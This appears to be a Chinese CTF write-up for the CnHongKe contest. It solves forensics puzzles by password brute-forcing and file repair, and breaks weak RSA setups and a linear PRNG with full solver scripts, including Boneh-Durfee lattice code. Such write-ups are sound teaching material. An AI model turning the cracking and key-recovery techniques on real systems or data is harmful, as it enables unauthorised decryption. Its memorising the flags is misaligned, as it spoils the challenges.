/z2M9F9bx88Lhj1Z76t+X4jW2+HJGpbufG7OaeOSnpdS3YtrqPeNxd5ntWtGxnim
GKQTv0iADHI6hSQuvxHPYn9g5GDClQFVDTr19xOlo/9nRGkBixbfPUpFLocHk2eE
mcF5tpjUNbNGLGX7pkJQvF38qBn50kyByBRm2WCH8ntaHWJ0N5+uB2oT2c1dYemt
u5M6nBER31q4YNBku+kUJT9cHGwYDOPeWY1bxOYlEfJhhwgrM9jvtIdqKq8awBao
gnQIQdh4rIXE3vQlz73ulFrAgEBl6qdcFFkYdj4F4GJLGlP+Kk1Xe+++/8YaKoiS
mtR9arYUNPhdMJ6dkpRpD6ZKWCbRFceOHEsQoD88493aBc8Y/WflEJTrAjKYRtLO
dL4qOMduCYX4oAs//F0ahvBVomI20Ck59cFBIE198hDzhEaaWMI9OyjVdmP6j+lZ
l1hYspqm/x4cgrbsI1gK/te2eK1nv+TqNvsrNWQD
=MkMD
-----END PGP PRIVATE KEY BLOCK-----

一个私钥一个PGP信息,但是没有PGP私钥的密码

在这里插入图片描述

得到密码 password填入密码导入私钥

gpg --import key.pgp

gpg --decrypt cipher.asc

在这里插入图片描述

CnHongke{427316cf6004a4d83be9c6474ec6ba45}

鸡蛋别放在一起

在这里插入图片描述
在这里插入图片描述

文件名都是32位的,里面还有不少的base64,随便跳了一个,MD5爆破出来是数字,猜测是顺序,根据文件名得到顺序,然后拼起来

import base64
import zipfile
import hashlib

dic = {hashlib.md5(str(i).encode()).hexdigest(): i for i in range(5141)}
zf = zipfile.ZipFile("./1a8158054c76602e19ee7face3c3aaef.zip")

baseStr = list(5141 * " ")
for fileName in zf.namelist():
    md5 = fileName.replace(".txt", "")
    baseStr[dic[md5]] = zf.read(fileName)
  
with open("flag.out", "wb") as f:
    f.write(base64.b64decode(b''.join(baseStr)))

010打开发现是zip,重命名为 flag.zip

你在寻找钥匙么?
也许你该了解一下图片中的花朵。

ps:钥匙为12位纯数字,试试爆破?

Vm0weE1HRXdOVWRpUm1oVlYwZDRXRmxVU2xOalZsWnpWMjFHV0ZKdGVGcFpNRlpyVmxVeFdHVkljRmhoTVZWNFdXdGFZV015VGtaYVJtUlRUVEJLUlZacVFtdFNNRFZ6VjI1T2FsSnNjRmhhVjNoaFVsWmtWMVZyZEZOTmF6RTBWMnRvVTFWR1duUlZiR2hXWWtkb1JGVXdXbUZTTVdSelYyczFWMkpXU2xwV1ZFb3dXVlpTYzFkc1ZtbFNiV2hYV1d4b2IyVldjRlpYYlVacVlrWndlbFpIZUhkV01rWTJWbGhrVjJFeVVUQlpla1p6VjBaYWRWTnNhR2xTTTJob1ZtMTBWMUp0VmtkVmJHUlRWa2Q0VWxaV1VYZFBVVDA5

得到一个提示,和一张图片,图片中是水仙花数zz

在这里插入图片描述

在这里插入图片描述

​尾部还有一个RC4,首先肯定不是爆破,不太实际,根据图片,所以是水仙花数,百度了一下没有12位的水仙花数,但是3位数的有4个
在这里插入图片描述

153370371407

在这里插入图片描述
在这里插入图片描述
至于为什么单独把这个拿出来解密不了,我的猜测是,出题人先把密文放在图片后面然后加密,然后再把图片改回去,因为 RC4 后明文长度和密码长度一样,但是解密必须要带着图片一起解密了,不然不行

CnHongKe{ab8924781d4c9b5f1bd0c5adfb14c8ec}

谍影重重

  1. 打开docx提示有错误,我们把后缀名改为.zip,解压里面能找到一个flag.zip,大小42,基本符合是正确的flag,里面还有一个 secret.wav​ ,拖入 deepsound​ 直接提示有密码,爆破看看

在这里插入图片描述

我用的是我的脚本,内置了一些规则而已,得到密码 20210110
脚本链接:https://github.com/Byxs20/johnCrack
在这里插入图片描述

在这里插入图片描述

  1. 得到 passwd.txt​,应该指的是 key.zip​ 的密码,修好zip头打开 passwd.txt

在这里插入图片描述

应该是16进制,但是被换了,使用PuzzleSolver看看有哪些字符
工具链接:https://github.com/Byxs20/PuzzleSolver(真的好用)

在这里插入图片描述

一共17个字符串,因为带了一个空格,字母是 npqros​,正确顺序应该是 nopqrs​ 和 abcdef​ 做了置换,撸了脚本

with open("./passwd.txt", "r") as f:
    data = f.read()

table = str.maketrans("nopqrs", "abcdef")
bin_str = str.translate(data, table).replace("\n", "").replace(" ", "")

with open("out.out", "wb") as f:
    f.write(bytes.fromhex(bin_str))

打开一看,jpg头部,后缀名改成jpg,模板匹配结果一眼看到

在这里插入图片描述
​passwd_1:interesting_
在这里插入图片描述

还有一个也得到了:passwd_2:exif 、interesting_exif 解压key.zip

在这里插入图片描述
​使用字典爆破密码:January_10th

在这里插入图片描述

解压zip,得flag

CnHongKe{a94a0b9467e33b41a850b774ba889e9f}

crypto

asr

from Crypto.Util.number import *
from secret import flag

def genprime():
	while True:
		r = getRandomNBitInteger(64)
		p = r**6 + 8*r**4 - 41*r**3 + 14*r**2 - 116*r + 31387
		q = r**5 - 9*r**4 + 17*r**3 - 311*r**2 - 16*r + 14029
		if isPrime(p) and isPrime(q):
			return p, q

def enc(flag, n):
	m = bytes_to_long(flag)
	return pow(m, 31387, n)

p, q = genprime()
n = p * q
c = enc(flag, n)
print(n)
print(c)

题解

因为这个指数爆炸的,所以开方下来的r是可能小于或大于正常的r(但在r的附近),

我们尝试爆破一下,满足if的三个条件就成立,然后恢复p,在常规RSA解

n=73553176031506251642448229714220151174734540964434813056145000616720019024269982417494553771890010861489245572362590935764438928110836109730139595790550323300572059713433794357690270439325805603980903813396260703
c=6035303231100318215656164353047198868742763055193754611914191674005776329646395050293747516587004104241717689072827492745628156828285466831779549229513115371571798719567117034735830671759951028004405762435531685
from gmpy2 import *
from Crypto.Util.number import *
# r=iroot(n,11)[0]
# for i in range(100000):
#     p = r**6 + 8*r**4 - 41*r**3 + 14*r**2 - 116*r + 31387
#     q = r**5 - 9*r**4 + 17*r**3 - 311*r**2 - 16*r + 14029
#     r=r+1
#     if isPrime(p) and isPrime(q) and n==p*q:
#         print(p)
#         break

p=36610088622356068137383969963658126276773383894090903529990995656124701988715522981081991290515245553076636123915483
q=n//p
e=31387
d=inverse(e,p-1)
m=pow(c,d,p)
print(long_to_bytes(m))
# b'CnHongKe{m0re_fuN_RSA!!!}'

easyrsa

from Crypto.Util.number import *
from gmpy2 import invert
#from secret import flag,e
e=11299
flag="CnHongKe{xxxxx}"

def enc(key, p):
    e, n = key
    cipher = [pow(ord(char), e, n) for char in p]
    return cipher

def dec(pk, c):
    key, n = pk
    plain = [chr(pow(char, key, n)) for char in c]
    return ''.join(plain)

p = getPrime(512)
q = getPrime(512)
n = p*q

pubkey = (e,n)

assert(e < 20000)
print("Public key:")
print(pubkey[1])

cipher = (enc(pubkey, flag))

print("Encrypted flag:")
print(cipher)

题解

这题的enc函数中,将flag的每个字节分别进行加密,这导致明文空间只有256,简单枚举即可算出m。e应该是未知的,我们对e进行遍历爆破得到开头字母C,得到e

n = 72247494519029483967034760366376786853061601103300157813759661775953565912596351092287547406601293830981872918918938736057259213906558022493243888210973589378711150746378675386713286364059548872717761789465830532496818860955952848759604076974545518597370294034234115061042965941759696027120414108241913315823
c = [23086568633766027889700149282556028601873588133389538577048220777519629053893020835596785887647597774272630671514043075789089166339490664485821551265008072526985961605709337174865785620861795518368806256695564549352791382917399957127324333828822855864895189216581775972150143373812919138450624070271563605781, 61424780590998716668669522879005833894226611068988736111090847848564952203683192799647992306556603909310758923465682857752771528865725336620979965796403804180726836508128298963907214867637490978049881021200499605597084724400813056262536028860369819412653602159130062278358850923752212354694875260742761085298, 48972347185727309580275811398968322398732292284718613286033964656750569533816676490768122129969818200823106363038086076716848785261859085349544695714346759435389253954398744742706972731080540025437559712419376172012608552755595256980994587437212314607911439680754158685958213442852345610886117149808132016667, 61900034054386621130587335874165191153789670659043111868368913383427388843553828977951515166753531254554889530123861241679942156133394477844988559568261609121966239636746106844585498882352452796587012169345091313195906669668187972481122815780919799898784783071380231308771760678158462462371463688337980966056, 61424780590998716668669522879005833894226611068988736111090847848564952203683192799647992306556603909310758923465682857752771528865725336620979965796403804180726836508128298963907214867637490978049881021200499605597084724400813056262536028860369819412653602159130062278358850923752212354694875260742761085298, 9450415868171579852265098054119152648200942770623210086786809222084784959844945630371248180007508011953947300816820109987312423346559505226253550792399518771112488858163511513111841198409634670818742944088825363946933893952656072580401498319136121912520261916028145167846733858193149171599064970439268199783, 10035734578627344969947375235594072983851319696847209997368331158831147669149961069031833471519627366504594153020437204571060611428623914456969214997923532068856482468179965518854707629794312716955250557912419773434419097161023559262564458848063915219346903480654597328232422644596377103117825829328614075690, 5651041338136387965270707005514495599960051787842260459297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 14271259146328702790695772784067429851163342737347538777950741762508946650827944617931146968866218980425939274541815935964077603794848153188731356254177631333208035026728310408767228380734867744475231330055609453484352384922899766458129175972076865172633564831188088602907146780176603278159798710852150155253, 62406194652765011605245085350409728452067228284594736543030951188813141827047471129688563874017873401654027493958313799538667190622125421268982329762449606129199279688989354341511243792985075002044026442461088633434402762089223231979549393979184803396697173744411798858018768084174805247172995100258785744206, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 565104133813638796527070700551449559996005178784226045,
9297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 3956140276099962408524811644378665260926195324627931125735919417604617330787900581903522720016806707086965650313838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 26352444581944643830963227423429946980811236174292159142870560906116668786800921081108266494217634934060542948019867625299869944900083383044563948756655507024025376518773098977036898176798319228360435941463124583821154981070698271384027340432620539761424919238056654209894138660851835259359180413998571510866, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 3956140276099962408524811644378665260926195324627931125735919417604617330787900581903522720016806707086965650313838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 38583572018907364214647900005166742548285199585572254326541125387795789224923544225334386246655335740938100752554849888600258201438026409196139322439518308323982209353504064739859448757230608480631399883893401220790226127149746215151900805996489931009866529965548635227695192170717058032494324346363053930619, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 39561402760999624085248116443786652609261953246279311257359194176046173307879005819035227200168067070869656503,
13838135840992580442876605474811383818108244966337270671303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 5651041338136387965270707005514495599960051787842260459297309665876049923224924292148523058126335232362070965833156272480917510429785778533039914573874120321092901286353688478193761623313802721160582545556066963078690764669931722358118104123077318311422846797054759255064946480668759913078778113387444436772, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 21643731734484252696109953515687478013118937715056061520976924340371395968660338303624558633862679263768843575243426341986847599097591917653435606042602095144570247241757302533523905744626606836773661026140082883368820615972739914083417816255913686820936373857254933361629603081613492930030281179652207492149, 48888685774691755361314428123012470903274435407919121739086146641066936108772671897622273617773466901370666579985825990735116909193505734002962914749300893402294987407241465624548368394059300582991374404299605248595530416820237532082552535859877438232561386581747696852665114096889765422722443550622873560905, 64940238786056387401400208343541494710106569145648776253264921960848871998112873944735053044143142466740886274718484463159497520574083206269832189589919893550520334911490391957266450195041949757369417242568602992393025242097901450113737739057611554182495438506865992404354942119595468005771945393932589768474, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 40143952866342512113851528831224840428508359508863486720333430314639020044892359484055175960350878532212164045297142804890441825145732613460997839927190176844605217276182528040788352071676527553305037569493706223713078036314819975031692707790811142576347096406283580538840499698900522007082050790381461432333, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 63709385155465577684045832627013714734477675077145869296144855691101040965871249828804609100346204070983371062590273336734564969020068052618256509773408613924173909751351554561064586129837540954337160904415625404892669592986127801019807989827319368290273765648256480872195493742292667971088647173453059033806, 395614027609996240852481164437866526092619532462793112573591941760461733078790058190352272001680670708696565031383813584099258044287660547481138381810824496633727067,
1303251812771008272858935652243561913687651063565007930291142413707811828393424201379693530423289355865533076364121921469892110296393354892615, 48977318868316177241868377840886234518379318740788414464335149639789241373564334219732049732484152649864293157598629604567238775720288389168177046142209467079549232009426147052416900999957014084019576693027561825654624690272350264451017869825303585254430358271190141844081570800201723992346171314406386674943, 20593313344992264722474643208232460904729585942331327945281307002575544045487870568637031063784433406096326172788745559326479291854636106027597680333110098010128235038952685620360851399518780967171732233524825381055879695801401425059095441692301391956163400460584139637380367489591078077440142620116997434358]
for i in range(20000):
    if pow(ord('C') , i , n) == c[0]:
        e = i
        print(e)
        break
e=11299
m=''
for c1 in c:
    for i in range(127) :
            if pow(i,11299,n)==c1:
                m+=chr(i)
print(m)
# CnHongKe{a8cc755d375811f55cec82153388c}

bd

from Crypto.Util.number import *
from secret import flag

p = getPrime(512)
q = getPrime(512)
n = p * q
d = getPrime(299)
e = inverse(d,(p-1)*(q-1))
m = bytes_to_long(flag)
c = pow(m,e,n)
hint1 = p >> (512-70)
hint2 = q >> (512-70)

print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
print(f"hint1 = {hint1}")
print(f"hint2 = {hint2}")

题解

论文题,论文链接:https://github.com/mimoo/RSA-and-LLL-attacks

sage

from __future__ import print_function
import time

############################################
# Config
##########################################

"""
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
"""
debug = True

"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
"""
strict = False

"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
"""
helpful_only = True
dimension_min = 7  # stop removing if lattice reaches that dimension


############################################
# Functions
##########################################

# display stats on helpful vectors
def helpful_vectors(BB, modulus):
    nothelpful = 0
    for ii in range(BB.dimensions()[0]):
        if BB[ii, ii] >= modulus:
            nothelpful += 1

    print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")


# display matrix picture with 0 and X
def matrix_overview(BB, bound):
    for ii in range(BB.dimensions()[0]):
        a = ('%02d ' % ii)
        for jj in range(BB.dimensions()[1]):
            a += '0' if BB[ii, jj] == 0 else 'X'
            if BB.dimensions()[0] < 60:
                a += ' '
        if BB[ii, ii] >= bound:
            a += '~'
        print(a)


# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):
    # end of our recursive function
    if current == -1 or BB.dimensions()[0] <= dimension_min:
        return BB

    # we start by checking from the end
    for ii in range(current, -1, -1):
        # if it is unhelpful:
        if BB[ii, ii] >= bound:
            affected_vectors = 0
            affected_vector_index = 0
            # let's check if it affects other vectors
            for jj in range(ii + 1, BB.dimensions()[0]):
                # if another vector is affected:
                # we increase the count
                if BB[jj, ii] != 0:
                    affected_vectors += 1
                    affected_vector_index = jj

            # level:0
            # if no other vectors end up affected
            # we remove it
            if affected_vectors == 0:
                print("* removing unhelpful vector", ii)
                BB = BB.delete_columns([ii])
                BB = BB.delete_rows([ii])
                monomials.pop(ii)
                BB = remove_unhelpful(BB, monomials, bound, ii - 1)
                return BB

            # level:1
            # if just one was affected we check
            # if it is affecting someone else
            elif affected_vectors == 1:
                affected_deeper = True
                for kk in range(affected_vector_index + 1, BB.dimensions()[0]):
                    # if it is affecting even one vector
                    # we give up on this one
                    if BB[kk, affected_vector_index] != 0:
                        affected_deeper = False
                # remove both it if no other vector was affected and
                # this helpful vector is not helpful enough
                # compared to our unhelpful one
                if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(bound - BB[ii, ii]):
                    print("* removing unhelpful vectors", ii, "and", affected_vector_index)
                    BB = BB.delete_columns([affected_vector_index, ii])
                    BB = BB.delete_rows([affected_vector_index, ii])
                    monomials.pop(affected_vector_index)
                    monomials.pop(ii)
                    BB = remove_unhelpful(BB, monomials, bound, ii - 1)
                    return BB
    # nothing happened
    return BB


"""
Returns:
* 0,0   if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""


def boneh_durfee(pol, modulus, mm, tt, XX, YY):
    """
    Boneh and Durfee revisited by Herrmann and May

    finds a solution if:
    * d < N^delta
    * |x| < e^delta
    * |y| < e^0.5
    whenever delta < 1 - sqrt(2)/2 ~ 0.292
    """

    # substitution (Herrman and May)
    PR.< u, x, y>= PolynomialRing(ZZ)
    Q = PR.quotient(x * y + 1 - u)  # u = xy + 1
    polZ = Q(pol).lift()

    UU = XX * YY + 1

    # x-shifts
    gg = []
    for kk in range(mm + 1):
        for ii in range(mm - kk + 1):
            xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kk
            gg.append(xshift)
    gg.sort()

    # x-shifts list of monomials
    monomials = []
    for polynomial in gg:
        for monomial in polynomial.monomials():
            if monomial not in monomials:
                monomials.append(monomial)
    monomials.sort()

    # y-shifts (selected by Herrman and May)
    for jj in range(1, tt + 1):
        for kk in range(floor(mm / tt) * jj, mm + 1):
            yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)
            yshift = Q(yshift).lift()
            gg.append(yshift)  # substitution

    # y-shifts list of monomials
    for jj in range(1, tt + 1):
        for kk in range(floor(mm / tt) * jj, mm + 1):
            monomials.append(u ^ kk * y ^ jj)

    # construct lattice B
    nn = len(monomials)
    BB = Matrix(ZZ, nn)
    for ii in range(nn):
        BB[ii, 0] = gg[ii](0, 0, 0)
        for jj in range(1, ii + 1):
            if monomials[jj] in gg[ii].monomials():
                BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)

    # Prototype to reduce the lattice
    if helpful_only:
        # automatically remove
        BB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)
        # reset dimension
        nn = BB.dimensions()[0]
        if nn == 0:
            print("failure")
            return 0, 0

    # check if vectors are helpful
    if debug:
        helpful_vectors(BB, modulus ^ mm)

    # check if determinant is correctly bounded
    det = BB.det()
    bound = modulus ^ (mm * nn)
    if det >= bound:
        print("We do not have det < bound. Solutions might not be found.")
        print("Try with highers m and t.")
        if debug:
            diff = (log(det) - log(bound)) / log(2)
            print("size det(L) - size e^(m*n) = ", floor(diff))
        if strict:
            return -1, -1
    else:
        print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")

    # display the lattice basis
    if debug:
        matrix_overview(BB, modulus ^ mm)

    # LLL
    if debug:
        print("optimizing basis of the lattice via LLL, this can take a long time")

    BB = BB.LLL()

    if debug:
        print("LLL is done!")

    # transform vector i & j -> polynomials 1 & 2
    if debug:
        print("looking for independent vectors in the lattice")
    found_polynomials = False

    for pol1_idx in range(nn - 1):
        for pol2_idx in range(pol1_idx + 1, nn):
            # for i and j, create the two polynomials
            PR.<w, z>= PolynomialRing(ZZ)
            pol1 = pol2 = 0
            for jj in range(nn):
                pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
                pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)

            # resultant
            PR.<q>= PolynomialRing(ZZ)
            rr = pol1.resultant(pol2)

            # are these good polynomials?
            if rr.is_zero() or rr.monomials() == [1]:
                continue
            else:
                print("found them, using vectors", pol1_idx, "and", pol2_idx)
                found_polynomials = True
                break
        if found_polynomials:
            break

    if not found_polynomials:
        print("no independant vectors could be found. This should very rarely happen...")
        return 0, 0

    rr = rr(q, q)

    # solutions
    soly = rr.roots()

    if len(soly) == 0:
        print("Your prediction (delta) is too small")
        return 0, 0

    soly = soly[0][0]
    ss = pol1(q, soly)
    solx = ss.roots()[0][0]

    #
    return solx, soly


def example():
    ############################################
    # How To Use This Script
    ##########################################

    #
    # The problem to solve (edit the following values)
    #

    # the modulus
    N = 73337798113265277242402875272164983073482378701520700321577706460042584510776095519204866950129951930143711572581533177043149866218358557626070702546982947219557280493881836314492046745063916644418320245218549690820002504737756133747743286301499039227014032044403571945455215839074583290324966069724343874361
    e = 42681919079074901709680276679968298324860328305878264036188155781983964226653746568102282190906458519960811259171162918944726137301701132135900454469634110653076655027353831375989861927565774719655974876907429954299669710134188543166679161864800926130527741511760447090995444554722545165685959110788876766283
    c = 35616516401097721876690503261383371143934066789806504179229622323608172352486702183654617788750099596415052166506074598646146147151595929618406796332682042252530491640781065608144381326123387506000855818316664510273026302748073274714692374375426255513608075674924804166600192903250052744024508330641045908599
    L=94273059221083385396
    sh = L << (512 - 67)

    # the hypothesis on the private exponent (the theoretical maximum is 0.292)
    delta = .292  # this means that d < N^delta

    #
    # Lattice (tweak those values)
    #

    # you should tweak this (after a first run), (e.g. increment it until a solution is found)
    m = 6  # size of the lattice (bigger the better/slower)

    # you need to be a lattice master to tweak these
    t = int((1 - 2 * delta) * m)  # optimization from Herrmann and May
    X = floor(N ^ delta)  # this _might_ be too much
    Y = floor(2 ^445)  # correct if p, q are ~ same size

    #
    # Don't touch anything below
    #

    # Problem put in equation
    P.< x, y >= PolynomialRing(ZZ)
    A = int((N + 1) / 2 - sh)
    pol = 1 + x * (A + y)
    '''
    e d = 1 + k (p-1) (q-1)

    e d = 1 + k (N+1) + k s

    e d = 1 + 2k ((N+1)/2 + s/2)

    e d = 1 + 2k ((N+1)/2 + sh/2 + sl/2)
    '''

    #
    # Find the solutions!
    #

    # Checking bounds
    if debug:
        print("=== checking values ===")
        print("* delta:", delta)
        print("* delta < 0.292", delta < 0.292)
        print("* size of e:", int(log(e) / log(2)))
        print("* size of N:", int(log(N) / log(2)))
        print("* m:", m, ", t:", t)

    # boneh_durfee
    if debug:
        print("=== running algorithm ===")
        start_time = time.time()

    solx, soly = boneh_durfee(pol, e, m, t, X, Y)

    # found a solution?
    if solx > 0:
        print("=== solution found ===")
        if False:
            print("x:", solx)
            print("y:", soly)

        d = int(pol(solx, soly) / e)
        print("private key found:", d)
    else:
        print("=== no solution was found ===")

    if debug:
        print(("=== %s seconds ===" % (time.time() - start_time)))


if __name__ == "__main__":
    example()
n = 73337798113265277242402875272164983073482378701520700321577706460042584510776095519204866950129951930143711572581533177043149866218358557626070702546982947219557280493881836314492046745063916644418320245218549690820002504737756133747743286301499039227014032044403571945455215839074583290324966069724343874361
c = 35616516401097721876690503261383371143934066789806504179229622323608172352486702183654617788750099596415052166506074598646146147151595929618406796332682042252530491640781065608144381326123387506000855818316664510273026302748073274714692374375426255513608075674924804166600192903250052744024508330641045908599
d=783087701705468761679148299766995936398557044101882919430819055852416479930185217204358163
from Crypto.Util.number import *
m=pow(c,d,n)
print(long_to_bytes(m))

根据论文恢复d,后面正常解rsa得到m

prng

from Crypto.Util.number import *
from secret import flag
import random

def base(n, l):
    bb = []
    while n > 0:
        n, r = divmod(n, l)
        bb.append(r)
    return ''.join(str(d) for d in bb[::-1])

def prng(secret):

	seed = base(secret, 5)
	seed = [int(i) for i in list(seed)]
	length = len(seed)
	R = [[ random.randint(0,4) for _ in range(length)] for _ in range(length*2)]
	S = []
	for r in R:
		s = 0
		for index in range(length):
			s += (r[index] * seed[index]) % 5
		s %= 5
		S.append(s)
	return R, S

m = bytes_to_long(flag)
R, S = prng(m)

with open('output.txt', 'w') as f:
	f.write(f'R = {R}\nS = {S}')

题解

根据线性代数解一下,直接解 linear system 搞定

实际上就是R.seed=S,给定R和S求seed。计算过程在模5下进行。但是R为l^2行,l列,如果直接解矩阵方程复杂度太大不可行,考虑只取前3l行进行计算,矩阵满秩且复杂度可接受

from Crypto.Util.number import *

R=[]
R_=R
r=matrix(GF(5),R_)
s=matrix(GF(5),S).transpose()
seed=r\s
m=seed.list()
flag="".join(map(str,m))
FLAG=int(flag,5)
print(long_to_bytes(FLAG))
# CnHongKe{l1ne4r_prng_1s_d4ngr0s~~!d9uxdj9223}
零上安全
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
2021年长安电子数据取证比赛复盘完整版(wp
flyable的博客
08-29 1万+
2021年长安电子数据取证比赛复盘完整版(wp
【比赛writeup】2023省赛-Reverse-Re2
zippo1234的博客
06-25 252
1、标题:Re22、关键字:换表BASE643、比赛:2023省赛4、工具:IDAx64、python。
美亚复盘
最新发布
weixin_61110028的博客
12-11 51
2023江苏领航线上赛WP某道逆向&解密
qq_52344654的博客
08-23 1075
那么这个题目关键就考察这个迷宫的脚本怎么写 那么学习数据结构的童鞋,应该都是接触过的,深度or广度?这里就不想这么多了。对程序简单分析一波,要求很明显了:需要从1,1作为起点出发,且必须要经过163,96,最终到达终点131,193。就是一个压缩包,两个文件,打开其中一个就晓得是个很典型的迷宫题目了,不过搞个201*201纯纯无语。进去看看,这里就很显然了,走迷宫的规矩 1是墙壁0是道,以及出口最终是131,193这个点。64位 先分析主函数,可以看到最终的flag是要md5加密的,上面有个if的判断。
青龙面板无法拉库的解决办法
热门推荐
且行好事莫问前程
02-14 3万+
最近,突然很多面板内的脚本都无法更新,也无法拉取新库。主要由于青龙(老版本)默认使用了 https://ghproxy.com/ 这个Github代理加速,导致了请求量比较大的JD仓库被该代理加速作者封禁。 解决方案: 1.可以直接访问Github的用户: 2.无法访问Github的用户: 宿主机上青龙面板修改配置文件 config.sh 文件中的GithubProxyUrl参数解决。 修改青龙 config.sh 文件中的GithubProxyUrl参数为(低调使用,不是作者本人的): GithubP
红帽wp红帽wp
05-06
红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp红帽wp
2023羊城 DASCTF EZ-Misc
09-03
2023羊城 DASCTF EZ-Misc
2022第三届网鼎白虎组misc830原题附件
09-03
2022第三届网鼎白虎组misc830原题附件
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
攻防世界miss-01,杂项misc太湖
11-01
攻防世界miss_01,杂项misc太湖。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
青龙2.11.3对接傻妞+go-cqhttp+短信登+本地服务器直连GitHub
m0_66724697的博客
08-10 2万+
先执行更新命令,一行一行输入。执行第一串命令到中间时需要选择,然后继续完成接下来的指令串:拉取docker容器。:开启权限。拉取青龙面板。5101:5700这一串是你的面板端口,建议把5101这串数字更改为较为隐蔽的端口,以免被他人爆破执行完拉取指令去浏览器登录面板=服务器ip+端口粘贴下面代码 并回车(一键安装所有依赖)第一个完整版,耗时间第二个精简版,比第一个快安装完成后是这样 输入退出容器exit。.........
